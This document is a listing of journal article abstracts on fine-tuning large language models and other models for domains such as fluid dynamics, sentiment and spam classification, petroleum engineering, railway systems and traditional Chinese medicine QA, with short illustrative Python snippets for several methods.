Journal Articles: 42 articles found
1. Optimizing Fine-Tuning in Quantized Language Models: An In-Depth Analysis of Key Variables
Authors: Ao Shen, Zhiquan Lai, Dongsheng Li, Xiaoyu Hu. Computers, Materials & Continua (SCIE, EI), 2025(1): 307-325.
Large-scale Language Models (LLMs) have achieved significant breakthroughs in Natural Language Processing (NLP), driven by the pre-training and fine-tuning paradigm. While this approach allows models to specialize in specific tasks with reduced training costs, the substantial memory requirements during fine-tuning present a barrier to broader deployment. Parameter-Efficient Fine-Tuning (PEFT) techniques, such as Low-Rank Adaptation (LoRA), and parameter quantization methods have emerged as solutions to these challenges by optimizing memory usage and computational efficiency. Among these, QLoRA, which combines PEFT and quantization, has demonstrated notable success in reducing memory footprints during fine-tuning, prompting the development of various QLoRA variants. Despite these advancements, the quantitative impact of key variables on the fine-tuning performance of quantized LLMs remains underexplored. This study presents a comprehensive analysis of these key variables, focusing on their influence across different layer types and depths within LLM architectures. Our investigation uncovers several critical findings: (1) larger layers, such as MLP layers, can maintain performance despite reductions in adapter rank, while smaller layers, like self-attention layers, are more sensitive to such changes; (2) the effectiveness of balancing factors depends more on specific values than on layer type or depth; (3) in quantization-aware fine-tuning, larger layers can effectively utilize smaller adapters, whereas smaller layers struggle to do so. These insights suggest that layer type is a more significant determinant of fine-tuning success than layer depth when optimizing quantized LLMs. Moreover, for the same reduction in trainable parameters, shrinking the trainable parameters of a larger layer preserves fine-tuning accuracy better than doing so in a smaller one. This study provides valuable guidance for more efficient fine-tuning strategies and opens avenues for further research into optimizing LLM fine-tuning in resource-constrained environments.
Keywords: large-scale language model; parameter-efficient fine-tuning; parameter quantization; key variable; trainable parameters; experimental analysis
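A minimal PyTorch sketch of the mechanism this paper varies: LoRA adapters of different rank attached to frozen base layers, with the larger rank reserved for the smaller self-attention projection, following the paper's finding. The layer sizes and rank values below are illustrative, not the paper's settings.

```python
import torch
import torch.nn as nn

class LoRALinear(nn.Module):
    """Frozen base linear layer plus a trainable low-rank update (LoRA)."""
    def __init__(self, base: nn.Linear, rank: int, alpha: float = 16.0):
        super().__init__()
        self.base = base
        for p in self.base.parameters():
            p.requires_grad = False          # quantized/frozen weights stay fixed
        self.A = nn.Parameter(torch.randn(rank, base.in_features) * 0.01)
        self.B = nn.Parameter(torch.zeros(base.out_features, rank))
        self.scale = alpha / rank            # the "balancing factor" alpha / r

    def forward(self, x):
        return self.base(x) + (x @ self.A.T @ self.B.T) * self.scale

# Illustrative allocation: the large MLP projection tolerates a small rank,
# while the smaller attention projection is given a larger one.
mlp_proj = LoRALinear(nn.Linear(4096, 11008), rank=4)
attn_proj = LoRALinear(nn.Linear(4096, 4096), rank=16)
```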
2. Fine-tuning a large language model for automating computational fluid dynamics simulations
Authors: Zhehao Dong, Zhen Lu, Yue Yang. Theoretical & Applied Mechanics Letters, 2025(3): 219-225.
Configuring computational fluid dynamics (CFD) simulations typically demands extensive domain expertise, limiting broader access. Although large language models (LLMs) have advanced scientific computing, their use in automating CFD workflows is underdeveloped. We introduce a novel approach centered on domain-specific LLM adaptation. Fine-tuning Qwen2.5-7B-Instruct on NL2FOAM, our custom dataset of 28,716 natural-language-to-OpenFOAM configuration pairs with chain-of-thought (CoT) annotations, enables direct translation from natural language descriptions to executable CFD setups. A multi-agent system orchestrates the process, autonomously verifying inputs, generating configurations, running simulations, and correcting errors. Evaluation on a benchmark of 21 diverse flow cases demonstrates state-of-the-art performance, achieving 88.7% solution accuracy and an 82.6% first-attempt success rate. This significantly outperforms larger general-purpose models such as Qwen2.5-72B-Instruct, DeepSeek-R1, and Llama3.3-70B-Instruct, while also requiring fewer correction iterations and maintaining high computational efficiency. The results highlight the critical role of domain-specific adaptation in deploying LLM assistants for complex engineering workflows. Our code and fine-tuned model have been deposited at https://github.com/YYgroup/AutoCFD.
Keywords: large language models; fine-tuning; computational fluid dynamics; automated CFD; multi-agent system
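A sketch of how one NL2FOAM training pair might be packed for supervised fine-tuning. The field names and chat layout are assumptions, since the record schema is not given in this abstract (the linked repository is authoritative).

```python
def to_sft_record(nl_description: str, cot: str, foam_config: str) -> dict:
    """Pack one natural-language-to-OpenFOAM pair, with its chain-of-thought
    annotation, into a chat-style fine-tuning record (hypothetical schema)."""
    return {
        "messages": [
            {"role": "user", "content": nl_description},
            {"role": "assistant",
             "content": f"Reasoning:\n{cot}\n\nConfiguration:\n{foam_config}"},
        ]
    }

record = to_sft_record(
    "Simulate steady incompressible laminar flow in a 2D lid-driven cavity.",
    "Steady + incompressible + laminar suggests the simpleFoam solver ...",
    "system/controlDict: { application simpleFoam; ... }",
)
```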
3. Optimizing Airline Review Sentiment Analysis: A Comparative Analysis of LLaMA and BERT Models through Fine-Tuning and Few-Shot Learning
Authors: Konstantinos I. Roumeliotis, Nikolaos D. Tselikas, Dimitrios K. Nasiopoulos. Computers, Materials & Continua, 2025(2): 2769-2792.
In the rapidly evolving landscape of natural language processing (NLP) and sentiment analysis, improving the accuracy and efficiency of sentiment classification models is crucial. This paper investigates the performance of two advanced models, the Large Language Model (LLM) LLaMA and the NLP model BERT, in the context of airline review sentiment analysis. Through fine-tuning, domain adaptation, and the application of few-shot learning, the study addresses the subtleties of sentiment expression in airline-related text data. Employing predictive modeling and comparative analysis, the research evaluates the effectiveness of Large Language Model Meta AI (LLaMA) and Bidirectional Encoder Representations from Transformers (BERT) in capturing sentiment intricacies. Fine-tuning, including domain adaptation, enhances the models' performance in sentiment classification tasks. Additionally, the study explores the potential of few-shot learning to improve model generalization using minimal annotated data for targeted sentiment analysis. By conducting experiments on a diverse airline review dataset, the research quantifies the impact of fine-tuning, domain adaptation, and few-shot learning on model performance, providing valuable insights for industries aiming to predict recommendations and enhance customer satisfaction through a deeper understanding of sentiment in user-generated content (UGC). This research contributes to refining sentiment analysis models, ultimately fostering improved customer satisfaction in the airline industry.
Keywords: sentiment classification; review sentiment analysis; user-generated content; domain adaptation; customer satisfaction; LLaMA model; BERT model; airline reviews; LLM classification; fine-tuning
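A sketch of the few-shot setup the paper evaluates: a handful of labeled airline reviews prepended to the query so a generative model like LLaMA can classify with minimal annotated data. The exemplars and template wording are illustrative.

```python
FEW_SHOT = [
    ("The crew was friendly and boarding was quick.", "positive"),
    ("Two-hour delay and no updates from the gate staff.", "negative"),
]

def few_shot_prompt(review: str) -> str:
    """Build a few-shot sentiment-classification prompt for a generative LLM."""
    lines = ["Classify each airline review as positive or negative."]
    for text, label in FEW_SHOT:
        lines.append(f"Review: {text}\nSentiment: {label}")
    lines.append(f"Review: {review}\nSentiment:")
    return "\n\n".join(lines)

print(few_shot_prompt("Seats were cramped but the food was decent."))
```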
4. Classification of Conversational Sentences Using an Ensemble Pre-Trained Language Model with the Fine-Tuned Parameter
Authors: R. Sujatha, K. Nimala. Computers, Materials & Continua (SCIE, EI), 2024(2): 1669-1686.
Sentence classification is the process of categorizing a sentence based on its context. Sentence categorization requires more semantic highlights than other tasks, such as dependency parsing, which requires more syntactic elements. Most existing strategies focus on the general semantics of a conversation without involving the context of the sentence, recognizing the progress, and comparing impacts. An ensemble of pre-trained language models is used here to classify conversational sentences from a conversation corpus. The sentences are classified into four categories: information, question, directive, and commission. These classification label sequences serve to analyze conversation progress and predict the pecking order of the conversation. An ensemble of Bidirectional Encoder Representations from Transformers (BERT), Robustly Optimized BERT Pretraining Approach (RoBERTa), Generative Pre-trained Transformer (GPT), DistilBERT, and Generalized Autoregressive Pretraining for Language Understanding (XLNet) models is trained on the conversation corpus with tuned hyperparameters. The hyperparameter-tuning approach is carried out for better performance on sentence classification. This Ensemble of Pre-trained Language Models with Hyperparameter Tuning (EPLM-HT) system is trained on an annotated conversation dataset. The proposed approach outperformed the base BERT, GPT, DistilBERT, and XLNet transformer models, and the ensemble model with fine-tuned parameters achieved an F1_score of 0.88.
Keywords: Bidirectional Encoder Representations from Transformers; conversation; ensemble model; fine-tuning; generalized autoregressive pretraining for language understanding; generative pre-trained transformer; hyperparameter tuning; natural language processing; robustly optimized BERT pretraining approach; sentence classification; transformer models
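One common way to combine the five fine-tuned classifiers is soft voting over their class probabilities; the abstract does not spell out the combination rule, so the simple averaging below is an assumption.

```python
import torch

def ensemble_predict(logits_per_model: list[torch.Tensor]) -> torch.Tensor:
    """Soft-vote: average class probabilities across fine-tuned models.
    Each tensor has shape (batch, 4) for the four dialogue-act classes:
    information, question, directive, commission."""
    probs = torch.stack([l.softmax(dim=-1) for l in logits_per_model])
    return probs.mean(dim=0).argmax(dim=-1)

# Stand-ins for BERT / RoBERTa / GPT / DistilBERT / XLNet classifier heads.
fake_logits = [torch.randn(8, 4) for _ in range(5)]
print(ensemble_predict(fake_logits))
```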
5. New approach to assess sperm DNA fragmentation dynamics: Fine-tuning mathematical models
Authors: Isabel Ortiz, Jesus Dorado, Jane Morrell, Jaime Gosalvez, Francisco Crespo, Juan M. Jimenez, Manuel Hidalgo. Journal of Animal Science and Biotechnology (SCIE, CAS, CSCD), 2017(3): 592-600.
Background: Sperm DNA fragmentation (sDF) has proved to be an important parameter for predicting in vitro the potential fertility of a semen sample. Colloid centrifugation could be a suitable technique to select those donkey sperm more resistant to DNA fragmentation after thawing. Previous studies have shown that, to elucidate the latent damage of the DNA molecule, sDF should be assessed dynamically, where the rate of fragmentation between treatments indicates how resistant the DNA is to iatrogenic damage. The rate of fragmentation is calculated using the slope of a linear regression equation, but it has not been studied whether sDF dynamics actually fit this model. The objectives of this study were to evaluate the effect of different after-thawing centrifugation protocols on sperm DNA fragmentation and to elucidate the most accurate mathematical model (linear regression, exponential, or polynomial) for DNA fragmentation over time in frozen-thawed donkey semen. Results: After submitting post-thaw semen samples to no centrifugation (UDC), sperm washing (SW), or single layer centrifugation (SLC) protocols, sDF values after 6 h of incubation were significantly lower in SLC samples than in SW or UDC. Coefficient of determination (R²) values were significantly higher for a second-order polynomial model than for linear or exponential models. The highest values for acceleration of fragmentation (aSDF) were obtained for SW, followed by SLC and UDC. Conclusion: SLC after thawing seems to preserve DNA longevity longer in comparison to UDC and SW. Moreover, the fine-tuning of models has shown that sDF dynamics in frozen-thawed donkey semen fit a second-order polynomial model, which implies that the fragmentation rate is not constant and fragmentation acceleration must be taken into account to elucidate hidden damage in the DNA molecule.
Keywords: colloid centrifugation; dynamics; fine-tuning; mathematical models; sperm DNA fragmentation
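The model comparison reduces to fitting sDF(t) with polynomials of increasing order and comparing R². Under a quadratic fit sDF(t) = at² + bt + c, the fragmentation acceleration aSDF corresponds to the constant second derivative 2a. A numpy sketch with made-up incubation data:

```python
import numpy as np

t = np.array([0.0, 1.0, 2.0, 4.0, 6.0])          # incubation time, h (illustrative)
sdf = np.array([12.0, 14.1, 17.0, 24.8, 36.5])   # % fragmented sperm (illustrative)

def r_squared(y, y_hat):
    return 1 - np.sum((y - y_hat) ** 2) / np.sum((y - y.mean()) ** 2)

linear = np.polyfit(t, sdf, 1)
quad = np.polyfit(t, sdf, 2)
print("R2 linear   :", r_squared(sdf, np.polyval(linear, t)))
print("R2 quadratic:", r_squared(sdf, np.polyval(quad, t)))
print("aSDF = 2a   =", 2 * quad[0])   # acceleration of fragmentation
```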
6. Artificial intelligence large model for logging curve reconstruction
Authors: CHEN Zhangxing, ZHANG Yongan, LI Jian, HUI Gang, SUN Youzhuang, LI Yizheng, CHEN Yuntian, ZHANG Dongxiao. Petroleum Exploration and Development, 2025(3): 842-854.
To improve the accuracy and generalization of well logging curve reconstruction, this paper proposes an artificial intelligence large language model, "Gaia", and conducts model evaluation experiments. By fine-tuning the pre-trained large language model, Gaia significantly improved its ability to extract sequential patterns and spatial features from well-log curves. Leveraging the adapter method for fine-tuning, the model required training only about 1/70 of its original parameters, greatly improving training efficiency. Comparative experiments, ablation experiments, and generalization experiments were designed and conducted using well-log data from 250 wells. In the comparative experiment, the Gaia model was benchmarked against cutting-edge small deep learning models and conventional large language models, demonstrating that Gaia reduced the mean absolute error (MAE) by at least 20%. In the ablation experiments, the synergistic effect of the Gaia model's multiple components was validated, with its MAE at least 30% lower than that of single-component models. In the generalization experiments, the superior performance of the Gaia model in blind-well predictions was further confirmed. Compared to traditional models, the Gaia model is significantly superior in accuracy and generalization for logging curve reconstruction, fully showcasing the potential of large language models in the field of well logging. This provides a new approach for future intelligent logging data processing.
Keywords: logging curve reconstruction; large language model; adapter; pre-trained model; fine-tuning method
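A sketch of the adapter idea behind Gaia's efficiency claim: small bottleneck modules are inserted and trained while the pre-trained backbone stays frozen, so only a small fraction of parameters updates. The dimensions are illustrative, and the roughly 1/70 figure depends on the actual model.

```python
import torch.nn as nn

class BottleneckAdapter(nn.Module):
    """Residual down-project / up-project adapter inserted after a frozen block."""
    def __init__(self, d_model: int = 4096, bottleneck: int = 32):
        super().__init__()
        self.down = nn.Linear(d_model, bottleneck)
        self.up = nn.Linear(bottleneck, d_model)
        self.act = nn.GELU()

    def forward(self, x):
        return x + self.up(self.act(self.down(x)))

backbone = nn.Sequential(*[nn.Linear(4096, 4096) for _ in range(8)])  # stand-in LLM
for p in backbone.parameters():
    p.requires_grad = False
adapters = nn.ModuleList([BottleneckAdapter() for _ in range(8)])

trainable = sum(p.numel() for p in adapters.parameters())
total = trainable + sum(p.numel() for p in backbone.parameters())
print(f"trainable fraction: about 1/{total // trainable}")
```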
7. ExplainableDetector: Exploring transformer-based language modeling approach for SMS spam detection with explainability analysis
Authors: Mohammad Amaz Uddin, Muhammad Nazrul Islam, Leandros Maglaras, Helge Janicke, Iqbal H. Sarker. Digital Communications and Networks, 2025(5): 1504-1518.
Short Message Service (SMS) is a widely used and cost-effective communication medium that has unfortunately become a frequent target for unsolicited messages, commonly known as SMS spam. With the rapid adoption of smartphones and increased Internet connectivity, SMS spam has emerged as a prevalent threat. Spammers have recognized the critical role SMS plays in modern communication, making it a prime target for abuse. As cybersecurity threats continue to evolve, the volume of SMS spam has increased substantially in recent years. Moreover, the unstructured format of SMS data creates significant challenges for SMS spam detection, making it more difficult to combat spam attacks successfully. In this paper, we present an optimized and fine-tuned transformer-based language model to address the problem of SMS spam detection. We use a benchmark SMS spam dataset to analyze this spam detection model. Additionally, we utilize pre-processing techniques to obtain clean and noise-free data, and we address the class imbalance problem by leveraging text augmentation techniques. The overall experiment showed that our optimized, fine-tuned BERT (Bidirectional Encoder Representations from Transformers) variant, RoBERTa, obtained a high accuracy of 99.84%. To further enhance model transparency, we incorporate Explainable Artificial Intelligence (XAI) techniques that compute positive and negative coefficient scores, offering insight into the model's decision-making process. Additionally, we evaluate the performance of traditional machine learning models as a baseline for comparison. This comprehensive analysis demonstrates the significant impact language models can have on addressing complex text-based challenges within the cybersecurity landscape.
Keywords: cybersecurity; machine learning; large language model; spam detection; text analytics; explainable AI; fine-tuning; transformer
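Inference with a fine-tuned RoBERTa spam classifier reduces to a few lines with the transformers pipeline API. The checkpoint name below is a placeholder, not the authors' released model; substitute a real fine-tuned checkpoint before running.

```python
from transformers import pipeline

# "your-org/roberta-sms-spam" is a hypothetical checkpoint name; replace it
# with an actual fine-tuned RoBERTa SMS-spam model.
classifier = pipeline("text-classification", model="your-org/roberta-sms-spam")

print(classifier("Congratulations! You have won a free prize. Reply WIN now."))
print(classifier("Running 10 minutes late, see you at the station."))
```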
8. Intelligent evaluation of sandstone rock structure based on a visual large model
Authors: REN Yili, ZENG Changmin, LI Xin, LIU Xi, HU Yanxu, SU Qianxiao, WANG Xiaoming, LIN Zhiwei, ZHOU Yixiao, ZHENG Zilu, HU Huiying, YANG Yanning, HUI Fang. Petroleum Exploration and Development, 2025(2): 548-558.
Existing sandstone rock structure evaluation methods rely on visual inspection, with low efficiency, only semi-quantitative analysis of roundness, and an inability to perform classified statistics in particle size analysis. This study presents an intelligent evaluation method for sandstone rock structure based on the Segment Anything Model (SAM). By developing a lightweight SAM fine-tuning method with rank-decomposition matrix adapters, a multispectral rock particle segmentation model named CoreSAM is constructed, which achieves rock particle edge extraction and type identification. Building upon this, we propose a comprehensive quantitative evaluation system for rock structure, assessing parameters including particle size, sorting, roundness, particle contact, and cementation types. The experimental results demonstrate that CoreSAM outperforms existing methods in rock particle segmentation accuracy while showing excellent generalization across different image types such as CT scans and core photographs. The proposed method enables full-sample, classified particle size analysis and quantitative characterization of parameters like roundness, advancing reservoir evaluation towards more precise, quantitative, intuitive, and comprehensive development.
Keywords: sandstone; rock structure; intelligent evaluation; Segment Anything Model; fine-tuning; particle edge extraction; type identification
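Once particle edges are extracted, the quantitative parameters follow from per-region geometry. The sketch below derives equivalent diameter, a common roundness proxy (4πA/P², strictly a circularity measure), and a sorting statistic from a binary mask; conventions for sorting and roundness vary, so treat these formulas as one reasonable choice rather than the paper's exact definitions.

```python
import numpy as np
from skimage.measure import label, regionprops

def particle_statistics(mask: np.ndarray):
    """mask: boolean array, True on grain pixels (e.g., from a CoreSAM-style
    segmentation). Returns per-grain diameters, circularities, and a sorting value."""
    regions = [r for r in regionprops(label(mask)) if r.perimeter > 0]
    diameters = np.array([np.sqrt(4 * r.area / np.pi) for r in regions])
    circularity = np.array([4 * np.pi * r.area / r.perimeter ** 2 for r in regions])
    sorting = np.std(np.log2(diameters))   # spread of phi-like log grain sizes
    return diameters, circularity, sorting

demo = np.zeros((64, 64), dtype=bool)
demo[5:15, 5:15] = True                    # one square "grain"
demo[30:50, 30:45] = True                  # one rectangular "grain"
print(particle_statistics(demo))
```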
9. TCMLCM: An intelligent question-answering model for traditional Chinese medicine lung cancer based on the KG2TRAG method
Authors: Chunfang ZHOU, Qingyue GONG, Wendong ZHAN, Jinyang ZHU, Huidan LUAN. Digital Chinese Medicine, 2025(1): 36-45.
Objective: To improve the accuracy and professionalism of a question-answering (QA) model for traditional Chinese medicine (TCM) lung cancer by integrating large language models with structured knowledge graphs using the knowledge graph to text-enhanced retrieval-augmented generation (KG2TRAG) method. Methods: The TCM lung cancer model (TCMLCM) was constructed by fine-tuning ChatGLM2-6B on the specialized datasets Tianchi TCM, HuangDi, and ShenNong-TCM-Dataset, as well as a TCM lung cancer KG. The KG2TRAG method was applied to enhance knowledge retrieval; it converts KG triples into natural language text via ChatGPT-aided linearization, leveraging large language models (LLMs) for context-aware reasoning. For a comprehensive comparison, MedicalGPT, HuatuoGPT, and BenTsao were selected as the baseline models. Performance was evaluated using bilingual evaluation understudy (BLEU), recall-oriented understudy for gisting evaluation (ROUGE), accuracy, and the domain-specific TCM-LCEval metrics, with validation from TCM oncology experts assessing answer accuracy, professionalism, and usability. Results: The TCMLCM model achieved optimal performance across all metrics, including a BLEU score of 32.15%, ROUGE-L of 59.08%, and an accuracy rate of 79.68%. Notably, in the TCM-LCEval assessment specific to the field of TCM, its performance was 3%-12% higher than that of the baseline models. Expert evaluations highlighted superior performance in accuracy and professionalism. Conclusion: TCMLCM provides an innovative solution for TCM lung cancer QA, demonstrating the feasibility of integrating structured KGs with LLMs. This work advances intelligent TCM healthcare tools and lays a foundation for future AI-driven applications in traditional medicine.
Keywords: traditional Chinese medicine (TCM); lung cancer; question-answering; large language model; fine-tuning; knowledge graph; KG2TRAG method
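The core of KG2TRAG is turning KG triples into natural-language text that an LLM can consume as retrieval context. The paper uses ChatGPT-aided linearization; the template-based version below is a simplified stand-in, with invented example triples.

```python
def linearize_triples(triples: list[tuple[str, str, str]]) -> str:
    """Render (head, relation, tail) triples as plain sentences for RAG context."""
    return " ".join(f"{h} {r} {t}." for h, r, t in triples)

facts = linearize_triples([
    ("Astragalus", "is a common herb in", "TCM lung cancer formulas"),
    ("Qi deficiency", "is treated by", "tonifying herbs"),
])
prompt = (f"Use only the following facts to answer.\nFacts: {facts}\n"
          f"Question: Which herbs address qi deficiency in lung cancer care?")
print(prompt)
```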
10. Research status and application of artificial intelligence large models in the oil and gas industry (Cited by 3)
Authors: LIU He, REN Yili, LI Xin, DENG Yue, WANG Yongtao, CAO Qianwen, DU Jinyang, LIN Zhiwei, WANG Wenjie. Petroleum Exploration and Development (SCIE), 2024(4): 1049-1065.
This article elucidates the concept of large model technology, summarizes the research status of large model technology both domestically and internationally, provides an overview of the application status of large models in vertical industries, outlines the challenges and issues confronted in applying large models in the oil and gas sector, and offers prospects for their application in the oil and gas industry. Existing large models can be briefly divided into three categories: large language models, visual large models, and multimodal large models. The application of large models in the oil and gas industry is still in its infancy. Based on open-source large language models, some oil and gas enterprises have released large language model products using methods like fine-tuning and retrieval-augmented generation. Scholars have attempted to develop scenario-specific models for oil and gas operations by using visual/multimodal foundation models. A few researchers have constructed pre-trained foundation models for seismic data processing and interpretation, as well as core analysis. The application of large models in the oil and gas industry faces several challenges: the current quantity and quality of data can hardly support the training of large models, research and development costs are high, and algorithmic autonomy and controllability remain poor. The application of large models should be guided by the needs of the oil and gas business, taking it as an opportunity to improve data lifecycle management, enhance data governance capabilities, promote the construction of computing power, strengthen the construction of "artificial intelligence + energy" composite teams, and boost the autonomy and controllability of large model technology.
Keywords: foundation model; large language model; visual large model; multimodal large model; large model of the oil and gas industry; pre-training; fine-tuning
11. Rotary-scaling fine-tuning (RSFT) method for optimizing railway wheel profiles and its application to a locomotive (Cited by 13)
Authors: Yunguang Ye, Yayun Qi, Dachuan Shi, Yu Sun, Yichang Zhou, Markus Hecht. Railway Engineering Science, 2020(2): 160-183.
Existing multi-objective wheel profile optimization methods mainly consist of three sub-modules: (1) wheel profile generation, (2) multi-body dynamics simulation, and (3) an optimization algorithm. For the first module, a comparably conservative rotary-scaling fine-tuning (RSFT) method, which introduces two design variables and an empirical formula, is proposed to fine-tune traditional wheel profiles and improve their engineering applicability. For the second module, for the TRAXX locomotives serving on the Blankenburg–Rubeland line, an optimization function representing the relationship between the wheel profile and the wheel–rail wear number is established based on a Kriging surrogate model (KSM). For the third module, a method combining the regression capability of the KSM with the iterative computing power of particle swarm optimization (PSO) is proposed to quickly and reliably optimize wheel profiles. Finally, with the RSFT–KSM–PSO method, we propose two wear-resistant wheel profiles for the TRAXX locomotives serving on the Blankenburg–Rubeland line, namely S1002-S and S1002-M. The S1002-S profile reduces the total wear number by 30%, while the S1002-M profile makes the wear distribution more uniform through a proper sacrifice of the tread wear number, reducing the total wear number by 21%. The quasi-static and hunting stability tests further demonstrate that the profiles designed by the RSFT–KSM–PSO method are promising for practical engineering applications.
Keywords: wheel profile optimization; wear reduction; rotary-scaling fine-tuning; particle swarm optimization; Kriging surrogate model
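The third module pairs a surrogate with particle swarm optimization. The numpy sketch below implements a standard PSO loop and minimizes a toy quadratic standing in for the Kriging-predicted wear number over the two RSFT design variables; the bounds, coefficients, and objective are all illustrative, not the paper's surrogate.

```python
import numpy as np

def pso(f, bounds, n_particles=20, iters=100, w=0.7, c1=1.5, c2=1.5, seed=0):
    """Minimal particle swarm optimizer over box bounds."""
    rng = np.random.default_rng(seed)
    lo, hi = np.array(bounds, dtype=float).T
    x = rng.uniform(lo, hi, (n_particles, lo.size))
    v = np.zeros_like(x)
    pbest, pbest_val = x.copy(), np.array([f(p) for p in x])
    gbest = pbest[pbest_val.argmin()]
    for _ in range(iters):
        r1, r2 = rng.random(x.shape), rng.random(x.shape)
        v = w * v + c1 * r1 * (pbest - x) + c2 * r2 * (gbest - x)
        x = np.clip(x + v, lo, hi)
        vals = np.array([f(p) for p in x])
        improved = vals < pbest_val
        pbest[improved], pbest_val[improved] = x[improved], vals[improved]
        gbest = pbest[pbest_val.argmin()]
    return gbest, pbest_val.min()

# Toy stand-in for the Kriging-predicted wear number over the two RSFT
# design variables (rotation, scaling).
wear_surrogate = lambda p: (p[0] - 0.3) ** 2 + 2.0 * (p[1] - 0.8) ** 2
best, best_val = pso(wear_surrogate, bounds=[(-1.0, 1.0), (0.0, 2.0)])
print(best, best_val)
```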
12. Construction and preliminary application of large language model for reservoir performance analysis
Authors: PAN Huanquan, LIU Jianqiao, GONG Bin, ZHU Yiheng, BAI Junhui, HUANG Hu, FANG Zhengbao, JING Hongbin, LIU Chen, KUANG Tie, LAN Yubo, WANG Tianzhi, XIE Tian, CHENG Mingzhe, QIN Bin, SHEN Yujiang. Petroleum Exploration and Development (SCIE), 2024(5): 1357-1366.
A large language model (LLM) is constructed to address the sophisticated demands of data retrieval and analysis, detailed well profiling, computation of key technical indicators, and the solution of complex problems in reservoir performance analysis (RPA). The LLM is built for RPA scenarios with incremental pre-training, fine-tuning, and functional-subsystem coupling. Functional subsystems and efficient coupling methods are proposed based on named entity recognition (NER), tool invocation, and Text-to-SQL construction, all aimed at resolving pivotal challenges in developing this application-specific LLM for RPA. This study conducted detailed accuracy tests on feature extraction models, tool classification models, data retrieval models, and analysis recommendation models. The results indicate that these models perform well in various key aspects of reservoir performance analysis. The research takes some injection and production well groups in the PK3 Block of the Daqing Oilfield as a test example. Testing results show that the model has significant potential and practical value in assisting reservoir engineers with RPA. The research results provide powerful support for the application of LLMs in reservoir performance analysis.
Keywords: reservoir performance analysis; artificial intelligence large model; application-specific large language model; incremental pre-training; fine-tuning; subsystems coupling; entity recognition; tool invocation
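The functional-subsystem coupling amounts to routing each query to the right tool (indicator calculation, well profiling, Text-to-SQL). The keyword router below is a deliberately simplified stand-in for the paper's trained classification models, and the tool names are invented.

```python
def route_query(query: str, tools: dict) -> str:
    """Dispatch a reservoir-analysis query to the first matching subsystem."""
    for keyword, tool in tools.items():
        if keyword in query.lower():
            return tool(query)
    return "No tool matched: answer directly with the base LLM."

TOOLS = {  # hypothetical subsystem hooks
    "water cut": lambda q: "indicator subsystem: compute water cut trend",
    "well profile": lambda q: "profiling subsystem: assemble well profile",
    "list": lambda q: "Text-to-SQL subsystem: SELECT ... FROM wells WHERE ...",
}

print(route_query("Plot the water cut for well group PK3-12", TOOLS))
```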
13. Key Technologies and Application Prospects of Railway Natural Language Large Model
Authors: SHI Tianyun, LI Xinqin, DAI Mingrui, SHI Weifeng, LI Guohua, DU Wenran, SHEN Meiying (translated). Chinese Railways, 2024(2): 11-20.
The emergence of artificial intelligence natural language large models has brought a new dawn for deep empowerment of the industry. Research on the key technologies and applications of a railway natural language large model is of great significance for promoting and coordinating the development of railway artificial intelligence. This paper puts forward application scenarios for the railway natural language large model according to the application requirements of railway artificial intelligence; designs the overall architecture of the railway natural language large model relying on the railway artificial intelligence platform; studies the key technologies of the natural language large model; builds a railway industry large model oriented to intelligent question answering and verifies it with actual data; and finally presents prospects for the development and application of the railway natural language large model in railway traffic organization, railway operation safety, and passenger service.
Keywords: intelligent HSR; artificial intelligence; railway natural language large model; application scenarios; large model architecture; large model fine-tuning; retrieval-augmented generation; railway knowledge question-answering
14. Training and Implementation of Subjective Questions Scoring System Based on the Baidu Qianfan Model Platform
Author: Xiaoyun Zhu. Journal of Contemporary Educational Research, 2024(11): 227-232.
Leveraging the Baidu Qianfan model platform, this paper designs and implements a highly efficient and accurate scoring system for subjective questions, focusing primarily on questions in the field of computer network technology. The system enhances the foundational model by utilizing Qianfan's training tools and integrating advanced techniques such as supervised fine-tuning. In the data preparation phase, a comprehensive collection of subjective-question data related to computer network technology is gathered, cleaned, and labeled. During model training and evaluation, optimal hyperparameters and tuning strategies are applied, resulting in a model capable of scoring with high accuracy. Evaluation results demonstrate that the proposed model performs well across multiple dimensions (content, expression, and development scores), yielding results comparable to those of manual scoring.
Keywords: subjective score; natural language processing; deep learning; Baidu Qianfan large model platform; supervised fine-tuning; model training and evaluation
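Supervised fine-tuning for a scorer comes down to pairing a grading prompt with target scores. The record layout below (field names, 0-10 scales, the three score dimensions named in the evaluation) is a plausible sketch, not the platform's actual schema.

```python
import json

def scoring_example(question: str, reference: str, answer: str, scores: dict) -> dict:
    """One SFT record teaching the model to emit rubric scores as JSON."""
    prompt = (f"Question: {question}\nReference answer: {reference}\n"
              f"Student answer: {answer}\n"
              "Grade content, expression, and development on a 0-10 scale as JSON:")
    return {"prompt": prompt, "response": json.dumps(scores)}

rec = scoring_example(
    "Explain the TCP three-way handshake.",
    "SYN, SYN-ACK, ACK establish a connection and synchronize sequence numbers.",
    "The client sends SYN, the server replies SYN-ACK, the client sends ACK.",
    {"content": 9, "expression": 8, "development": 6},
)
print(rec["prompt"], "\n->", rec["response"])
```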
15. A RAG-Based NL2SQL Method for Cultural Relic and Artwork Auction Data
Authors: LI Chenghua, ZHANG Liupeng, SHI Hongling. Journal of Computer Applications (PKU Core), 2025(S2): 82-87.
Natural Language to SQL (NL2SQL) lowers the technical barrier for non-specialists to operate databases, improving user experience and work efficiency. Retrieval-Augmented Generation (RAG) can further improve NL2SQL performance by introducing external knowledge bases. To address the high miss rate of current retrieval strategies and the weak relevance of recalled context in RAG-based NL2SQL, a sequenced-retrieval reranking RAG (RAG-SRR) method is proposed to optimize knowledge base construction, the retrieval and recall strategy, and prompt design. First, a domain knowledge base is built from three sources: question-answer pairs derived from high-frequency processing and query tasks in cultural relic and artwork auction supervision, professional terminology drawn from auction industry standards, and database schemas based on data from the Artron art auction website. Second, the retrieval stage adopts a sequenced-retrieval strategy that assigns different priorities to the three knowledge sources and reranks the retrieved information at the recall stage. Finally, principles for prompt optimization and prompt templates are given for the prompt design stage. Experimental results show that, on the domain dataset and the Spider dataset respectively, RAG-SRR improves execution accuracy by at least 19.50 and 24.20 percentage points over a method based on the BERT (Bidirectional Encoder Representations from Transformers) model, and by at least 12.17 and 8.90 percentage points over a method based on the RESDSQL (Ranking-enhanced Encoding plus a Skeleton-aware Decoding framework for text-to-SQL) model. Under the same large language model, RAG-SRR improves execution accuracy over an unoptimized RAG method by at least 12.83 and 15.60 percentage points, and over the C3SQL method by at least 1.50 and 3.10 percentage points. With Llama3.1-8B, compared with DIN-SQL, execution accuracy improves by 0.30 percentage points on the Chinese-corpus dataset and trails by at most 3.90 percentage points on the English-corpus dataset; with Qwen2.5-7B, it improves by 1.60 and 4.10 percentage points, respectively. These results indicate that RAG-SRR is practical and portable.
Keywords: Chinese natural language to SQL (NL2SQL); retrieval-augmented generation; large language model; reranking; cultural relic and artwork auction
